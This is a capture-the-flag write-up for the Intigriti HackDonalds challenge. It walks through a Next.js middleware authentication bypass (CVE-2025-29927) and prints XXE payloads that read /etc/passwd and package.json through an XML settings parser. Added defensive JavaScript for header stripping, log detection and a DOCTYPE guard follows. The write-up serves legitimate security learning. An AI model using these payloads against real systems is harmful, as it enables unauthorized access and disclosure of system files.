# HackDonalds Intigriti CTF

Challenge: <https://app.intigriti.com/programs/intigriti/challenge-hackdonalds/detail>

Target: <https://hackdonalds.intigriti.io/>

## Enumeration

The web application is pretty small, so I assume the culprit can be spotted fairly easily.

We see a menu, a home page, and a login/admin page.

When attempting to login the request is as follows:

<figure><img src="/files/nrrYJ0R9cleHlLaMSoi8" alt=""><figcaption></figcaption></figure>

Other requests look like this:

<figure><img src="/files/ad1jjDrKGFY09oemOBIJ" alt=""><figcaption></figcaption></figure>

I thought of LFI because of how the images are generated, but decided to google the components and the endpoints first.

We know it is a next.js application based on the "X-Powered-By" header.

<figure><img src="/files/jg8qE1IfNDQGXo9hGCOU" alt=""><figcaption></figcaption></figure>

We also see a request to an "admin.json" endpoint.

<figure><img src="/files/Klk4z5WrNCWiNxj26Qd9" alt=""><figcaption></figcaption></figure>

If we try to access "/admin" endpoint directly, it redirects us to "/login".

So we should google the URL components and see whether this is a common thing.

<figure><img src="/files/w9jC2hcydhMsd1vbUfMd" alt=""><figcaption></figcaption></figure>

And uh, it's pretty much pointless: I read things, but nothing helped.

Well okay, let's look for a new term: we know we're trying to access the "admin.json" endpoint, but the application redirects us to the "/login" page because we lack the permissions.

<figure><img src="/files/4FgaBoNMShKPVgKCk4DN" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.reddit.com/r/nextjs/comments/1ji1j4j/nextjs_middleware_authentication_bypass/>" %}

{% embed url="<https://www.neoxs.me/blog/critical-nextjs-middleware-vulnerability-cve-2025-29927-authentication-bypass>" %}

## Exploitation

We just follow the instructions and get ModHeader (we could also do this through Burp with match and replace, but this is an easy way too).

We only need step 5 to execute the concept; everything else is for knowledge's sake.

{% embed url="<https://www.neoxs.me/blog/critical-nextjs-middleware-vulnerability-cve-2025-29927-authentication-bypass#step-5-bypassing-authentication->" %}

And we add the header.

<figure><img src="/files/JvvyGR6tsYBID9zrs8rm" alt=""><figcaption></figcaption></figure>

Do a request to /admin and now we have access ^^.

<figure><img src="/files/0HmhEP7DWc1tjvvoAlTK" alt=""><figcaption></figcaption></figure>
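The bypass above works because vulnerable Next.js releases skip middleware for requests that carry the framework's internal `x-middleware-subrequest` header (CVE-2025-29927). Upgrading Next.js is the fix; the interim mitigation is to drop that header from everything arriving from outside and to log the attempt. The following is an added example of that mitigation and a matching log check; it is not code from the write-up or from the Next.js project. The `handleInbound` wrapper, its `upstream` callback and the access-log format are assumptions made for the example.

```javascript
// Added defensive example; not code from the write-up or from the Next.js project.
// CVE-2025-29927: vulnerable Next.js releases skipped middleware for requests carrying the
// internal "x-middleware-subrequest" header, so an outside client could send it and reach
// /admin without the auth redirect. Upgrading Next.js is the fix; until then the standard
// mitigation is to drop that header from every request arriving from outside the app and to
// record the attempt. Everything below is framework-free so it runs offline.

const INTERNAL_ONLY_HEADERS = new Set(['x-middleware-subrequest']);

// Remove internal-only headers from an inbound header map and report what was stripped.
// `headers` is a plain object like Node's IncomingMessage.headers (keys are lowercased here
// so that casing tricks do not matter).
function sanitizeInboundHeaders(headers) {
  const cleaned = {};
  const stripped = [];
  for (const [name, value] of Object.entries(headers)) {
    const key = name.toLowerCase();
    if (INTERNAL_ONLY_HEADERS.has(key)) {
      stripped.push(key);
      continue;
    }
    cleaned[key] = value;
  }
  return { headers: cleaned, stripped };
}

// Reverse-proxy style handler (hypothetical, for the example only): sanitize, log any
// attempt, then forward to `upstream`, a function standing in for the real proxy call.
function handleInbound(req, upstream, eventLog) {
  const { headers, stripped } = sanitizeInboundHeaders(req.headers);
  if (stripped.length > 0) {
    eventLog.push({ event: 'middleware-bypass-attempt', ip: req.ip, path: req.path, stripped });
  }
  return upstream({ ...req, headers });
}

// Retroactive detection over access-log lines that record request headers. Constructed
// sample log, one JSON object per line; presence of the header is the signal, its value
// is irrelevant to the check.
const SAMPLE_ACCESS_LOG = [
  '{"ip":"203.0.113.10","path":"/admin","headers":{"user-agent":"curl/8.0"}}',
  '{"ip":"203.0.113.22","path":"/admin","headers":{"x-middleware-subrequest":"1"}}',
  'not json at all',
  '{"ip":"198.51.100.7","path":"/admin","headers":{"X-Middleware-Subrequest":"1"}}',
  '{"ip":"203.0.113.10","path":"/menu","headers":{}}',
];

function findBypassAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    let entry;
    try {
      entry = JSON.parse(line);
    } catch (e) {
      continue; // malformed line: skip rather than abort the scan
    }
    const hdrs = (entry && entry.headers) || {};
    for (const name of Object.keys(hdrs)) {
      if (INTERNAL_ONLY_HEADERS.has(name.toLowerCase())) {
        hits.push({ ip: entry.ip, path: entry.path, header: name.toLowerCase() });
      }
    }
  }
  return hits;
}

// Stand-alone run: one bypass attempt through the handler, then a scan of the sample log.
const events = [];
const upstream = (req) => ({ status: 200, forwardedHeaders: Object.keys(req.headers) });
handleInbound(
  { ip: '203.0.113.22', path: '/admin', headers: { host: 'example.com', 'x-middleware-subrequest': '1' } },
  upstream,
  events
);
console.log(events, findBypassAttempts(SAMPLE_ACCESS_LOG));
```

The check keys on the header's presence only, because no legitimate client outside the app ever sets it; stripping it (rather than rejecting the request) keeps the proxy from breaking anything while the upgrade is rolled out.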

The only endpoint of interest is "/ice-cream-machines"; all the others are fluff.

<figure><img src="/files/eLXQCAjkES7pvFOp1D2k" alt=""><figcaption></figcaption></figure>

When you open a machine's settings you see an XML parser and the machine settings.

<figure><img src="/files/NgTibUjYvnq79iDFUGcl" alt=""><figcaption></figcaption></figure>

Now all we need is to read up on XXE.

{% embed url="<https://portswigger.net/web-security/xxe>" %}

When clicking on parse settings the following happens:

<figure><img src="/files/unnYB1jS4WTqbbamcy3t" alt=""><figcaption></figcaption></figure>

We need the following payload from the PortSwigger explanation.

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

We of course change `foo` to `machine` (the DOCTYPE name has to match the root element) and put `&xxe;` in the `<name>` element instead.

So our payload will look like this:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

And the output will look like this:

<figure><img src="/files/dtbUolW7SPKZMssT85v2" alt=""><figcaption></figcaption></figure>

Okay, now we need to find the flag. From here on it is just enumeration, trying to read files that are likely to hold something interesting. The flag is located in package.json, so we can extract it with the following payload:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [ <!ENTITY xxe SYSTEM "package.json"> ]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

<figure><img src="/files/LIm2Rl3tUFnZ2jf2D02R" alt=""><figcaption></figcaption></figure>
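Both payloads above rely on the settings parser expanding an external entity declared in the DOCTYPE. The durable fix is to configure the XML library so it never loads a DTD or resolves external entities (libxmljs, for instance, exposes this as the `noent` option; which library the HackDonalds app actually uses is not stated on the page, so that is an assumption). What follows is an added example of a pre-parse guard that sits in front of such a parser as defence in depth, together with a minimal field extractor; it is not code from the write-up or from the application. The function names, the allow-listed field names (taken from the page's payload) and the benign sample document are constructed for the example.

```javascript
// Added defensive example; not code from the write-up or from the HackDonalds app.
// The settings parser on this page expanded <!ENTITY xxe SYSTEM "..."> declarations, which
// is how /etc/passwd and package.json were read out through <name>. The durable fix is to
// configure the XML library so it never loads a DTD or resolves external entities (assumed
// available in whatever parser the app uses; libxmljs exposes it as the `noent` option).
// This guard sits in front of that parser as defence in depth: the settings form only ever
// needs a handful of plain elements, so any DOCTYPE at all is grounds for rejection.

const DOCTYPE_RE = /<!DOCTYPE\b/i;
// Matches <!ENTITY name SYSTEM "..."> and parameter entities <!ENTITY % name SYSTEM "...">.
const EXTERNAL_ENTITY_RE = /<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b/i;
// A custom entity reference (anything but the five predefined ones or a numeric reference).
const CUSTOM_ENTITY_REF_RE = /&(?!(?:amp|lt|gt|quot|apos|#\d+|#x[0-9a-f]+);)[A-Za-z_][\w.-]*;/i;

// Decide whether an uploaded settings document may be handed to the parser. Operates on
// the already-decoded string, so run it after transport decoding, not on raw bytes.
function inspectMachineSettings(xml) {
  if (DOCTYPE_RE.test(xml)) {
    return { accepted: false, reason: EXTERNAL_ENTITY_RE.test(xml) ? 'external-entity' : 'doctype' };
  }
  if (CUSTOM_ENTITY_REF_RE.test(xml)) {
    // Without a DTD a custom entity is undeclared anyway; reject rather than let the parser decide.
    return { accepted: false, reason: 'undeclared-entity' };
  }
  return { accepted: true, reason: null };
}

// The only elements the machine-settings form uses (taken from the payload on this page).
const ALLOWED_FIELDS = ['id', 'name', 'temperature', 'mixLevel', 'lastMaintenance', 'cleaningSchedule'];

// Guard first, then extract the fixed fields. Extraction is a minimal dependency-free
// stand-in for the hardened parser; it reads simple <field>text</field> elements only.
function parseMachineSettings(xml) {
  const verdict = inspectMachineSettings(xml);
  if (!verdict.accepted) {
    return { ok: false, reason: verdict.reason };
  }
  const fields = {};
  for (const f of ALLOWED_FIELDS) {
    const m = xml.match(new RegExp(`<${f}>([^<]*)</${f}>`));
    if (m) {
      fields[f] = m[1].trim();
    }
  }
  return { ok: true, fields };
}

// Constructed inputs: a benign settings document and the page's file-read payload.
const BENIGN_SETTINGS = `<?xml version="1.0" encoding="UTF-8"?>
<machine>
  <id>1</id>
  <name>Machine 1</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>`;

const XXE_PAYLOAD = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
</machine>`;

console.log(parseMachineSettings(BENIGN_SETTINGS));
console.log(parseMachineSettings(XXE_PAYLOAD));
```

The guard fails closed: a `<!DOCTYPE` that only appears inside a comment or CDATA section is still rejected, which is acceptable for a form that never needs one. It is a second layer, not a replacement for the parser setting; the rejection reason is meant to be logged so that repeated `external-entity` verdicts from one client show up in monitoring.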


